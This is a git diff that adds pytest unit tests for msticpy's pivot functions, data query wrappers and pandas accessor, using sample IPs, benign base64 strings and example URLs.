+    # ParamAttrs(type='str', query='get_heartbeat_for_ip', family='Network',
+    #  required=True)]
+    check.is_in(param_attrs[0].type, ("str", "list", "datetime"))
+    check.is_true(param_attrs[0].required)
+    check.is_not_none(param_attrs[0].query)
+    check.is_not_none(param_attrs[0].family)
+
+
+# Support functions and classes
+def _dummy_func(**kwargs):
+    kwargs.pop("start", None)
+    kwargs.pop("end", None)
+    return pd.DataFrame(pd.Series(kwargs)).T
+
+
+class _PType:
+    def __init__(self, p_type):
+        self.type = p_type
+
+    def __repr__(self):
+        return f"PType({self.type})"
+
+
+def _get_timespan():
+    end = datetime.utcnow()
+    return TimeSpan(start=(end - timedelta(1)), end=end)
+
+
+def _generate_test_data(**kwargs):
+    """Generate test data for iterable funcs."""
+    # Generate function settings
+    func_params = {kw: _PType(arg[0]) for kw, arg in kwargs.items()}
+    # Generate test params
+    params = {}
+    for kword, arg in kwargs.items():
+        if arg[1] > 1:
+            p_vals = [f"{kword}_val{num}" for num in range(arg[1])]
+        else:
+            p_vals = f"{kword}_val0"
+        params[kword] = p_vals
+
+    # Generate test DataFrame
+    list_lens = [len(value) for value in params.values() if isinstance(value, list)]
+    min_len = min(list_lens) if list_lens else 1
+    series = []
+    for row_num in range(min_len):
+        row_dict = {
+            param: value[row_num] if isinstance(value, list) else value
+            for param, value in params.items()
+        }
+
+        series.append(pd.Series(row_dict))
+
+    return func_params, params, pd.DataFrame(series)
+
+
+_WRAP_TEST_CASES = [
+    pytest.param(
+        {"p1": ("str", 1), "p2": ("str", 1)}, {"shape": (1, 2)}, id="simple values"
+    ),
+    pytest.param(
+        {"p1": ("str", 1), "p2": ("str", 1)},
+        {"param": ("other_param", "something_else"), "shape": (1, 3)},
+        id="simple values + static param",
+    ),
+    pytest.param(
+        {"p1": ("str", 1), "p2": ("list", 3), "p3": ("list", 4)},
+        {"shape": (3, 3)},
+        id="two lists",
+    ),
+    pytest.param(
+        {"p1": ("str", 1), "p2": ("list", 3), "p3": ("str", 4)},
+        {"shape": (3, 3)},
+        id="one list + func iterator param",
+    ),
+]
+
+
+@pytest.mark.parametrize("test_input, expected", _WRAP_TEST_CASES)
+def test_create_pivot_func(test_input, expected):
+    """Test wrapper creation for data queries."""
+    attrib_map = {"p1": "p1", "p2": "p2", "p3": "p3", "p4": "p4"}
+
+    # generate test data
+    f_params, params, test_df = _generate_test_data(**test_input)
+    call_data_query = _create_pivot_func(
+        _dummy_func, f_params, attrib_map, _get_timespan
+    )
+    add_params = (
+        {expected["param"][0]: expected["param"][1]} if "param" in expected else {}
+    )
+    result_df = call_data_query(**params, **add_params)
+
+    check.equal(result_df.shape, expected["shape"])
+    if add_params:
+        check.is_in(expected["param"][0], result_df)
+        check.equal(result_df.iloc[0][expected["param"][0]], expected["param"][1])
+        result_df = result_df.drop(columns=[expected["param"][0]])
+    check.is_true(test_df.compare(result_df).empty)
+
+
+_WRAP_TEST_CASES_DF = [
+    pytest.param(
+        {"p1": ("str", 1), "p2": ("list", 3), "p3": ("list", 4)},
+        {"shape": (3, 3)},
+        id="dataframe input",
+    ),
+    pytest.param(
+        {"p1": ("str", 1), "p2": ("list", 3), "p3": ("list", 4)},
+        {"param": ("p4", "p4_val"), "shape": (3, 4)},
+        id="dataframe input + static param",
+    ),
+]
+
+
+@pytest.mark.parametrize("test_input, expected", _WRAP_TEST_CASES_DF)
+def test_create_pivot_func_df(test_input, expected):
+    """Test wrapper creation for data queries."""
+    attrib_map = {"p1": "p1", "p2": "p2", "p3": "p3", "p4": "p4"}
+
+    # simple test with scalar params
+    f_params, params, test_df = _generate_test_data(**test_input)
+    call_data_query = _create_pivot_func(
+        _dummy_func, f_params, attrib_map, _get_timespan
+    )
+    add_params = (
+        {expected["param"][0]: expected["param"][1]} if "param" in expected else {}
+    )
+    # We're only expecting column names as values for kwargs
+    params = {p_name: p_name for p_name in params}
+    params.update({"data": test_df})
+    result_df = call_data_query(**params, **add_params)
+
+    check.equal(result_df.shape, expected["shape"])
+    if add_params:
+        check.is_in(expected["param"][0], result_df)
+        check.equal(result_df.iloc[0][expected["param"][0]], expected["param"][1])
+        result_df = result_df.drop(columns=[expected["param"][0]])
+    check.is_true(test_df.compare(result_df).empty)
+
+
+_ENT_QUERY_FUNC = [
+    (entities.Host, 25),
+    (entities.Account, 16),
+    (entities.IpAddress, 12),
+    (entities.Process, 7),
+    (entities.Url, 2),
+    (entities.Dns, 2),
+    (entities.AzureResource, 2),
+]
+
+
+@pytest.mark.skipif(not _KQL_IMP_OK, reason="Partial msticpy install")
+@pytest.mark.parametrize("entity, expected", _ENT_QUERY_FUNC)
+def test_add_queries_to_entities(entity, expected, azure_sentinel):
+    """Test query functions successfully added to entities."""
+    az_qry_funcs = PivotQueryFunctions(azure_sentinel)
+    add_queries_to_entities(az_qry_funcs, "data", _get_timespan)
+
+    check.is_true(hasattr(entity, "data"))
+    f_container = getattr(entity, "data")
+    check.is_instance(f_container, QueryContainer)
+    funcs = [func for func in dir(f_container) if not func.startswith("_")]
+    check.greater_equal(len(funcs), expected)
+
+    for func_name in funcs:
+        func = getattr(f_container, func_name)
+        check.equal(func.__qualname__, "_create_pivot_func.<locals>.wrapped_query_func")
+        check.is_in("Parameters", func.__doc__)
diff --git a/tests/datamodel/test_pivot_data_queries_run.py b/tests/datamodel/test_pivot_data_queries_run.py
new file mode 100644
index 000000000..f7d9b4835
--- /dev/null
+++ b/tests/datamodel/test_pivot_data_queries_run.py
@@ -0,0 +1,266 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test data query pivot functon handling of different input types."""
+import warnings
+from collections import namedtuple
+from pathlib import Path
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.data import QueryProvider
+from msticpy.data.query_container import QueryContainer
+from msticpy.datamodel import entities
+from msticpy.datamodel.pivot import Pivot
+
+from ..unit_test_lib import get_test_data_path
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="session")
+def data_providers():
+    """Return dict of providers."""
+    data_path = Path(get_test_data_path()) / "localdata"
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return {
+            "LocalData": QueryProvider(
+                "LocalData", data_paths=[str(data_path)], query_paths=[str(data_path)]
+            ),
+        }
+
+
+def _reset_entities():
+    """Clear any query containers in entities."""
+    for entity_name in ("Host", "IpAddress", "Account", "Url"):
+        entity = getattr(entities, entity_name)
+        for attr in dir(entity):
+            if isinstance(getattr(entity, attr), QueryContainer):
+                delattr(entity, attr)
+
+
+@pytest.fixture(scope="session")
+def _create_pivot(data_providers):
+    _reset_entities()
+    providers = data_providers.values()
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot(providers=providers)
+
+
+PivotQuery = namedtuple(
+    "PivotQuery",
+    "entity, attrib, value, provider, pivot_func, func_param, src_df_col, exp_count",
+)
+
+_IP_LIST = [
+    "104.211.30.1",
+    "104.211.30.2",
+    "192.168.0.1",
+    "127.0.0.1",
+]
+
+_HOST_LIST = ["host1", "host2", "host3"]
+
+_ACCOUNT_LIST = ["user1", "user2", "user3"]
+
+_PIVOT_QUERIES = [
+    pytest.param(
+        PivotQuery(
+            entity=entities.IpAddress,
+            attrib="Address",
+            value=_IP_LIST,
+            provider="LocalData",
+            pivot_func="list_azure_network_flows_by_ip",
+            func_param="ip_address_list",
+            src_df_col="ip",
+            exp_count=1,
+        ),
+        id="IpAddress-list_azure_network_flows_by_ip",
+    ),
+    pytest.param(
+        PivotQuery(
+            entity=entities.Host,
+            attrib="HostName",
+            value=_HOST_LIST,
+            provider="LocalData",
+            pivot_func="list_host_logons",
+            func_param="host_name",
+            src_df_col="cmdline",
+            exp_count=len(_HOST_LIST),
+        ),
+        id="Host-list_host_logons",
+    ),
+    pytest.param(
+        PivotQuery(
+            entity=entities.Account,
+            attrib="Name",
+            value=_ACCOUNT_LIST,
+            provider="LocalData",
+            pivot_func="list_logons_by_account",
+            func_param="account_name",
+            src_df_col="cmdline",
+            exp_count=len(_ACCOUNT_LIST),
+        ),
+        id="Account-list_logons_by_account",
+    ),
+]
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_data_query_entity(_create_pivot, test_case):
+    """Test calling function with entity attributes."""
+    # Test entity
+    first_val = next(iter(test_case.value))
+    init_args = {test_case.attrib: first_val}
+    entity = test_case.entity(**init_args)
+    func = getattr(getattr(entity, test_case.provider), test_case.pivot_func)
+    # Test entity input
+    # result_df = entity.LocalData.list_logons_by_account()
+    result_df = func(entity)
+    check.is_instance(result_df, pd.DataFrame)
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_data_query_value(_create_pivot, test_case):
+    """Test calling function with value."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+    # Test value input
+    val = next(iter(test_case.value))
+    params = {test_case.func_param: val}
+    result_df = func(**params)
+    check.is_instance(result_df, pd.DataFrame)
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_data_query_itbl(_create_pivot, test_case):
+    """Test calling function with iterable input."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+
+    val = next(iter(test_case.value))
+    params = {test_case.func_param: val}
+    single_val_result_df = func(**params)
+
+    # Test iterable input
+    val = test_case.value
+    params = {test_case.func_param: val}
+    result_df = func(**params)
+
+    check.is_instance(result_df, pd.DataFrame)
+    # For local data we are reading and returning the same data set each time
+    # for multi input values, we expect to get that number
+    # mulitplied by the number of input values, except in cases
+    # where the query supports "list" parameters. In that case we
+    # should just get 1x the data set.
+    check.equal(len(single_val_result_df) * test_case.exp_count, len(result_df))
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_data_query_df(_create_pivot, test_case):
+    """Test calling function with DF input attributes."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+
+    val = next(iter(test_case.value))
+    params = {test_case.func_param: val}
+    single_val_result_df = func(**params)
+
+    # Test DF input
+    val = test_case.value
+    in_df = pd.DataFrame(val, columns=[test_case.src_df_col])
+    params = {test_case.func_param: test_case.src_df_col}
+    result_df = func(data=in_df, **params)
+    check.is_instance(result_df, pd.DataFrame)
+    # For local data we are reading and returning the same data set each time
+    # for multi input values, we expect to get that number
+    # mulitplied by the number of input values, except in cases
+    # where the query supports "list" parameters. In that case we
+    # should just get 1x the data set.
+    check.equal(len(single_val_result_df) * test_case.exp_count, len(result_df))
+
+
+@pytest.mark.parametrize("join_type", ["left", "inner", "right"])
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_pivot_funcs_df_merge(_create_pivot, join_type, test_case):
+    """Test calling function with DF input attributes."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+    # Test DF input
+    val = test_case.value
+    in_df = pd.DataFrame(val, columns=[test_case.src_df_col])
+    params = {test_case.func_param: test_case.src_df_col}
+    in_df["extra_col1"] = "test1"
+    in_df["extra_col2"] = "test2"
+    result_no_merge_df = func(data=in_df, **params)
+
+    if test_case.entity not in (entities.Account, entities.Host):
+        # The IP test uses a list param so we cannot do index joins
+        # with it
+        with pytest.warns(UserWarning):
+            result_df = func(data=in_df, **params, join=join_type)
+        return
+
+    # should work ok with Account and Host
+    result_df = func(data=in_df, **params, join=join_type)
+
+    in_cols = in_df.shape[1]
+    no_merge_cols = result_no_merge_df.shape[1]
+    merge_cols = result_df.shape[1]
+    # merged DF should have result + input cols - join key col
+    check.greater_equal(no_merge_cols + in_cols, merge_cols)
+
+    if join_type in ("left", "inner"):
+        # inner and left joins should have same or greater length as input
+        check.greater_equal(result_df.shape[0], in_df.shape[0])
+        # all the keys from the input should be in the merged output
+        for row_val in in_df[test_case.src_df_col]:
+            check.is_in(row_val, result_df[test_case.src_df_col].values)
+    if join_type == "right":
+        # We don't know how many results we get back from right join
+        # (although should not be zero)
+        check.greater(len(result_df), 0)
+        # but all of its key values should be present in input
+        for row_val in result_df[test_case.src_df_col].values:
+            check.is_in(row_val, in_df[test_case.src_df_col].values)
+
+    join_in_data = {
+        0: "0x3e7",
+        1: "0xc90e957",
+        2: "0xc90ea44",
+        3: "0xc912d62",
+        4: "0xc913737",
+        10: "0x3e3",
+        14: "0x3e4",
+        15: "0xaddd",
+        16: "0xafff",
+        17: "0x3e5",
+        23: "no_match",
+    }
+    in_df = pd.DataFrame(
+        pd.Series(join_in_data), columns=["TargetLogonId"]
+    ).reset_index()
+    result_no_merge_df = func(data=in_df, **params)
+    result_df = func(
+        data=in_df,
+        **params,
+        join=join_type,
+        left_on="TargetLogonId",
+        right_on="TargetLogonId",
+    )
+    check.is_not_none(result_df)
+
+    if join_type in ("inner", "right"):
+        check.equal(len(result_df), len(result_no_merge_df))
+        for val in join_in_data.values():
+            if val != "no_match":
+                check.is_in(val, result_df["TargetLogonId"].values)
+            else:
+                check.is_not_in(val, result_df["TargetLogonId"].values)
+    if join_type == "left":
+        check.equal(len(result_df), len(result_no_merge_df) + 1)
+        for val in join_in_data.values():
+            check.is_in(val, result_df["TargetLogonId"].values)
diff --git a/tests/datamodel/test_pivot_input_types.py b/tests/datamodel/test_pivot_input_types.py
new file mode 100644
index 000000000..e3075d810
--- /dev/null
+++ b/tests/datamodel/test_pivot_input_types.py
@@ -0,0 +1,224 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test pivot function handling of different input types."""
+import warnings
+from collections import namedtuple
+
+import pandas as pd
+import pytest
+import pytest_check as check
+from msticpy.data import QueryProvider
+from msticpy.data.query_container import QueryContainer
+from msticpy.datamodel import entities
+from msticpy.datamodel.pivot import Pivot
+from msticpy.sectools import GeoLiteLookup, IPStackLookup, TILookup
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="session")
+def data_providers():
+    """Return dict of providers."""
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return {
+            "ti_lookup": TILookup(),
+            "geolite": GeoLiteLookup(),
+            #  "ip_stack": IPStackLookup(),
+        }
+
+
+def _reset_entities():
+    """Clear any query containers in entities."""
+    for entity_name in ("Host", "IpAddress", "Account", "Url"):
+        entity = getattr(entities, entity_name)
+        for attr in dir(entity):
+            if isinstance(getattr(entity, attr), QueryContainer):
+                delattr(entity, attr)
+
+
+@pytest.fixture(scope="session")
+def _create_pivot(data_providers):
+    _reset_entities()
+    providers = data_providers.values()
+    with warnings.catch_warnings():
+        warnings.simplefilter("ignore", category=UserWarning)
+        return Pivot(providers=providers)
+
+
+PivotQuery = namedtuple(
+    "PivotQuery",
+    "entity, value, provider, pivot_func, func_param, src_df_col, key_col, exp_col",
+)
+
+_IP_LIST = {
+    "104.211.30.1": "Public",
+    "104.211.30.2": "Public",
+    "192.168.0.1": "Private",
+    "127.0.0.1": "Loopback",
+}
+
+# pylint: disable=line-too-long
+_B64_ENCODINGS = {
+    "VGhpcyBpcyBhIHRlc3Qgb2YgYmFzZTY0IGVuY29kZWQgc3RyaW5n": "This is a test of base64 encoded string",
+    "QSBLdXN0byBxdWVyeSBpcyBhIHJlYWQtb25seSByZXF1ZXN0IHRvIHByb2Nlc3MgZGF0YS"
+    + "BhbmQgcmV0dXJuIHJlc3VsdHMu": "A Kusto query is a read-only request to process data and return results.",
+    "VGhpcyBpcyBhbiBlbWJlZGRlZCBCNjQgVkdocGN5QnBjeUJoSUhSbGMzUWdiMllnWW1GelpU"
+    + "WTBJR1Z1WTI5a1pXUWdjM1J5YVc1bg==": "This is an embedded B64 VGhpcyBpcyBhIHRlc3Qgb2YgYmFzZTY0IGVuY29kZWQgc3RyaW5n",
+}
+# pylint: enable=line-too-long
+
+_URLS = {
+    "https://www.contoso.com/path?p1=test&p2=10.2.4.5&hash=00236a2ae558018ed13b5222ef1bd987": {
+        "dns": "www.contoso.com",
+        "url": "input",
+        "ipv4": "10.2.4.5",
+        "md5_hash": "00236a2ae558018ed13b5222ef1bd987",
+    },
+    "https://www.microsoft.com/path?p1=test&p2=10.2.4.5&"
+    + "hash=EE35D33B6F6A069CE82E45C83FBDE97A267261E9": {
+        "dns": "www.microsoft.com",
+        "url": "input",
+        "ipv4": "10.2.4.5",
+        "sha1_hash": "EE35D33B6F6A069CE82E45C83FBDE97A267261E9",
+    },
+}
+
+_PIVOT_QUERIES = [
+    pytest.param(
+        PivotQuery(
+            entity=entities.IpAddress,
+            value=_IP_LIST,
+            provider="util",
+            pivot_func="ip_type",
+            func_param="ip_str",
+            src_df_col="ip",
+            key_col="ip",
+            exp_col="result",
+        ),
+        id="IpAddress-ip_type",
+    ),
+    pytest.param(
+        PivotQuery(
+            entity=entities.Process,
+            value=_B64_ENCODINGS,
+            provider="util",
+            pivot_func="b64decode",
+            func_param="value",
+            src_df_col="cmdline",
+            key_col="original_string",
+            exp_col="decoded_string",
+        ),
+        id="Process-b64decode",
+    ),
+    pytest.param(
+        PivotQuery(
+            entity=entities.Url,
+            value=_URLS,
+            provider="util",
+            pivot_func="extract_iocs",
+            func_param="value",
+            src_df_col="cmdline",
+            key_col="Input",
+            exp_col="Observable",
+        ),
+        id="Url-extract_iocs",
+    ),
+]
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_pivot_funcs_value(_create_pivot, test_case):
+    """Test calling function with value."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+    # Test value input
+    val = next(iter(test_case.value.keys()))
+    params = {test_case.func_param: val}
+    result_df = func(**params)
+    expected = next(iter(test_case.value.values()))
+    if isinstance(expected, dict):
+        for exp_value in expected.values():
+            if exp_value == "input":
+                exp_value = val
+            check.is_in(exp_value, result_df[test_case.exp_col].values)
+    else:
+        check.is_in(expected, result_df.iloc[0][test_case.exp_col])
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_pivot_funcs_itbl(_create_pivot, test_case):
+    """Test calling function with iterable input."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+    # Test value input
+    val = test_case.value.keys()
+
+    params = {test_case.func_param: val}
+    result_df = func(**params)
+
+    for key, expected in test_case.value.items():
+        key_results = result_df[result_df[test_case.key_col] == key]
+        if isinstance(expected, dict):
+            for exp_value in expected.values():
+                if exp_value == "input":
+                    exp_value = key
+                check.is_in(exp_value, key_results[test_case.exp_col].values)
+        else:
+            check.is_in(expected, key_results.iloc[0][test_case.exp_col])
+
+
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_pivot_funcs_df(_create_pivot, test_case):
+    """Test calling function with DF input attributes."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+    # Test DF input
+    val = test_case.value.keys()
+    in_df = pd.DataFrame(val, columns=[test_case.src_df_col])
+    result_df = func(data=in_df, src_column=test_case.src_df_col)
+    for key, expected in test_case.value.items():
+        key_results = result_df[result_df[test_case.key_col] == key]
+        if isinstance(expected, dict):
+            for exp_value in expected.values():
+                if exp_value == "input":
+                    exp_value = key
+                check.is_in(exp_value, key_results[test_case.exp_col].values)
+        else:
+            check.is_in(expected, key_results.iloc[0][test_case.exp_col])
+
+
+@pytest.mark.parametrize("join_type", ["left", "inner", "right"])
+@pytest.mark.parametrize("test_case", _PIVOT_QUERIES)
+def test_pivot_funcs_df_merge(_create_pivot, join_type, test_case):
+    """Test calling function with DF input attributes."""
+    func = getattr(getattr(test_case.entity, test_case.provider), test_case.pivot_func)
+    # Test DF input
+    val = enumerate(test_case.value.keys())
+    in_df = pd.DataFrame(val, columns=["idx", test_case.src_df_col])
+    in_df["extra_col1"] = "test1"
+    in_df["extra_col2"] = "test2"
+    result_no_merge_df = func(data=in_df, src_column=test_case.src_df_col)
+    result_df = func(data=in_df, src_column=test_case.src_df_col, join=join_type)
+
+    in_cols = in_df.shape[1]
+    no_merge_cols = result_no_merge_df.shape[1]
+    merge_cols = result_df.shape[1]
+    # merged DF should have result + input cols - join key col
+    check.greater_equal(no_merge_cols + in_cols, merge_cols)
+
+    if join_type in ("left", "inner"):
+        # inner and left joins should have same or greater length as input
+        check.greater_equal(result_df.shape[0], in_df.shape[0])
+        # all the keys from the input should be in the merged output
+        for key in in_df[test_case.src_df_col]:
+            check.is_in(key, result_df[test_case.key_col].values)
+    if join_type == "right":
+        # We don't know how many results we get back from right join
+        # (although should not be zero)
+        check.greater(len(result_df), 0)
+        # but all of its key values should be present in input
+        for key in result_df[test_case.key_col].values:
+            check.is_in(key, in_df[test_case.src_df_col].values)
diff --git a/tests/datamodel/test_pivot_pd_accessor.py b/tests/datamodel/test_pivot_pd_accessor.py
new file mode 100644
index 000000000..838814278
--- /dev/null
+++ b/tests/datamodel/test_pivot_pd_accessor.py
@@ -0,0 +1,249 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+from collections import Counter
+from pathlib import Path
+
+import pandas as pd
+import pytest
+import pytest_check as check
+
+from msticpy.datamodel import pivot_pd_accessor
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+@pytest.fixture(scope="session")
+def test_df():
+    """Fixture_docstring."""
+    csv_file = Path(TEST_DATA_PATH).joinpath("host_logons.csv")
+    return pd.read_csv(csv_file, index_col=0)
+
+
+def test_load_accessor(test_df):
+    """Function_docstring."""
+    check.is_not_none(getattr(test_df, "mp_pivot"))
+    check.is_not_none(getattr(test_df.mp_pivot, "run"))
+    check.is_not_none(getattr(test_df.mp_pivot, "display"))
+    check.is_not_none(getattr(test_df.mp_pivot, "tee"))
+    check.is_not_none(getattr(test_df.mp_pivot, "tee_exec"))
+    check.is_not_none(getattr(test_df.mp_pivot, "filter"))
+    check.is_not_none(getattr(test_df.mp_pivot, "filter_cols"))
+    check.is_not_none(getattr(test_df.mp_pivot, "sort"))
+
+
+def _nop_df(data, **kwargs):
+    """Test function for test_pd_run."""
+    for key, val in kwargs.items():
+        data[key] = val
+    return data
+
+
+def test_pd_run(test_df, capsys):
+    """Test mp_pivot.run accessor."""
+    res_df = test_df.mp_pivot.run(
+        _nop_df, test_col="test_val", verbose=True, debug=True
+    )
+    check.equal(len(res_df), len(test_df))
+    cap_out = capsys.readouterr().out
+    check.is_in("rows returned from", cap_out)
+    check.is_in("Columns in result", cap_out)
+    check.is_in("Parameters:", cap_out)
+    check.is_in("test_col", res_df.columns)
+
+
+def test_pd_display(test_df, capsys):
+    """Test mp_pivot.display accessor."""
+    test_df.mp_pivot.display(
+        _nop_df,
+        cols=["Computer", "SubjectUserName", "TargetUserName"],
+        query="TargetUserName != 'MSTICAdmin'",
+    )
+    cap_out = capsys.readouterr().out
+    check.is_in("Computer   SubjectUserName TargetUserName", cap_out)
+    check.is_not_in("MSTICAdmin", cap_out)
+    check.equal(Counter(cap_out.split())["MSTICAlertsWin1"], 12)
+    check.equal(len(cap_out.split("\n")), len(test_df) + 1)
+    test_df.mp_pivot.display(
+        _nop_df,
+        cols=["Computer", "SubjectUserName", "TargetUserName"],
+        query="TargetUserName != 'MSTICAdmin'",
+        head=5,
+    )
+    cap_out = capsys.readouterr().out
+    check.is_in("Computer   SubjectUserName TargetUserName", cap_out)
+    check.equal(Counter(cap_out.split())["MSTICAlertsWin1"], 5)
+
+
+class _IPython:
+    """Test class for mocking IPython."""
+
+    def __init__(self):
+        self.ns_table = {"user_local": {"test_var": None}}
+
+
+# For some reason this test works locally but not in pytest
+# from the commandline - assuming it's something to do with the
+# way the mock class is handled.
+@pytest.mark.skip()
+def test_tee(test_df, monkeypatch):
+    """Test mp_pivot.tee_exec accessor."""
+    ipython = _IPython()
+
+    def _m_get_ipython():
+        """Path get_ipython."""
+        return ipython
+
+    monkeypatch.setattr(pivot_pd_accessor, "get_ipython", _m_get_ipython)
+
+    # with pytest.warns(UserWarning):
+    # Try with variable that already exists
+    test_df.mp_pivot.tee(var_name="test_var")
+    check.is_none(ipython.ns_table["user_local"]["test_var"])
+
+    test_df.mp_pivot.tee(var_name="test_var", clobber=True)
+    print(ipython.ns_table["user_local"]["test_var"])
+    print(type(ipython.ns_table["user_local"]["test_var"]))
+
+    check.is_instance(ipython.ns_table["user_local"]["test_var"], pd.DataFrame)
+    check.is_true(test_df.compare(ipython.ns_table["user_local"]["test_var"]).empty)
+
+
+def test_tee_exec(test_df):
+    """Test mp_pivot.tee_exec accessor."""
+    res_df = test_df.mp_pivot.tee_exec("head", 5)
+    check.equal(res_df.shape, test_df.shape)
+    check.is_true(test_df.compare(res_df).empty)
+
+
+def test_filter_cols(test_df):
+    """Test mp_pivot.filter_cols accessor."""
+    res_df = test_df.mp_pivot.filter_cols(cols="Computer")
+    check.equal(res_df.shape, (14, 1))
+
+    res_df = test_df.mp_pivot.filter_cols(cols="Target*")
+    check.equal(res_df.shape, (14, 4))
+
+    res_df = test_df.mp_pivot.filter_cols(cols=["Computer", "Target*"])
+    check.equal(res_df.shape, (14, 5))
+
+    with pytest.raises(ValueError):
+        res_df = test_df.mp_pivot.filter_cols(cols=["Missing", "Missing2"])
+
+    res_df = test_df.mp_pivot.filter_cols(cols=["computer", "Target*"], match_case=True)
+    check.equal(res_df.shape, (14, 4))
+
+    res_df = test_df.mp_pivot.filter_cols(
+        cols=["LogonProcessName", "Target*"], sort_cols=True
+    )
+    check.equal(res_df.shape, (14, 5))
+    check.equal(res_df.columns[0], "LogonProcessName")
+
+
+def test_filter(test_df):
+    """Test mp_pivot.filter accessor."""
+    res_df = test_df.mp_pivot.filter(expr="MSTICAdmin")
+    check.equal(len(res_df), 2)
+
+    res_df = test_df.mp_pivot.filter(expr="2361334927")
+    check.equal(len(res_df), 3)
+
+    res_df = test_df.mp_pivot.filter(expr="msticadmin", match_case=True)
+    check.equal(len(res_df), 0)
+
+    res_df = test_df.mp_pivot.filter(expr=4624, match_case=True)
+    check.equal(len(res_df), 14)
+    res_df = test_df.mp_pivot.filter(expr=4625, match_case=True)
+    check.equal(len(res_df), 0)
+    res_df = test_df.mp_pivot.filter(expr="4624", match_case=True, numeric_col=True)
+    check.equal(len(res_df), 14)
+
+    with pytest.raises(TypeError):
+        res_df = test_df.mp_pivot.filter(expr=["Missing", "Missing2"])
+
+
+def test_sort(test_df):
+    """Test mp_pivot.sort accessor."""
+    res_df = test_df.mp_pivot.sort(cols="TargetUserName")
+    check.equal(res_df.iloc[0].TargetUserName, "MSTICAdmin")
+
+    res_df = test_df.mp_pivot.sort(cols=["TargetUserName", "Computer"])
+    check.equal(res_df.iloc[0].TargetUserName, "MSTICAdmin")
+
+    res_df = test_df.mp_pivot.sort(cols=["TargetUserName", "Computer"], ascending=False)
+    check.equal(res_df.iloc[0].TargetUserName, "adm1nistrator")
+
+    res_df = test_df.mp_pivot.sort(cols=["TargetUserName:asc", "Computer"])
+    check.equal(res_df.iloc[0].TargetUserName, "MSTICAdmin")
+
+    res_df = test_df.mp_pivot.sort(cols=["TargetUserName:desc", "Computer"])
+    check.equal(res_df.iloc[0].TargetUserName, "adm1nistrator")
+
+    res_df = test_df.mp_pivot.sort(cols={"TargetUserName": True, "Computer": False})
+    check.equal(res_df.iloc[0].TargetUserName, "MSTICAdmin")
+
+    res_df = test_df.mp_pivot.sort(cols={"TargetUserName": False, "Computer": False})
+    check.equal(res_df.iloc[0].TargetUserName, "adm1nistrator")
+
+    res_df = test_df.mp_pivot.sort(
+        cols={"TargetUserName": True, "Computer": False}, ascending=False
+    )
+    check.equal(res_df.iloc[0].TargetUserName, "adm1nistrator")
+
+
+def test_list_to_rows():
+    """Test list_to_rows."""
+    test_df = pd.DataFrame(
+        {
+            "col1": [["1item1", "1item2"], ["1item3", "1item4"], ["1item5"]],
+            "col2": [["2item1", "2item2"], ["2item3", "2item4"], ["2item5"]],
+            "col3": [1, 2, 3],
+        }
+    )
+    check.equal(len(test_df), 3)
+    # on a single column we should get 2 additional rows
+    exp_df = test_df.mp_pivot.list_to_rows(cols="col1")
+    check.equal(len(exp_df), 5)
+    check.equal(exp_df.col1.iloc[0], "1item1")
+    # with both col1 and col2, the first two rows will be expanded twice so + 4
+    exp_df = test_df.mp_pivot.list_to_rows(cols=["col1", "col2"])
+    check.equal(len(exp_df), 9)
+    check.equal(exp_df.col1.iloc[0], "1item1")
+    check.equal(exp_df.col2.iloc[0], "2item1")
+
+
+def test_parse_json():
+    """Test list_to_rows."""
+    test_df = pd.DataFrame(
+        {
+            "col1": [
+                '["1item1", "1item2"]',
+                '{"key": ["1item3", "1item4"]}',
+                '{"key2": "1item5"}',
+            ],
+            "col2": [23, "Not JSON", None],
+            "col3": [1, 2, 3],
+        }
+    )
+    check.equal(len(test_df), 3)
+    # all rows should be converted
+    exp_df = test_df.mp_pivot.parse_json(cols="col1")
+    check.equal(len(exp_df), 3)
+    check.is_instance(exp_df.col1.iloc[0], list)
+    check.is_instance(exp_df.col1.iloc[1], dict)
+    # rows in col1 are converted, col2 values are not converted
+    exp_df = test_df.mp_pivot.parse_json(cols=["col1", "col2"])
+    check.equal(len(exp_df), 3)
+    check.is_instance(exp_df.col1.iloc[0], list)
+    check.is_instance(exp_df.col1.iloc[1], dict)
+    check.is_instance(exp_df.col1.iloc[2], dict)
+    check.is_instance(exp_df.col2.iloc[0], int)
+    check.is_instance(exp_df.col2.iloc[1], str)
+    check.equal(exp_df.col2.iloc[2], None)
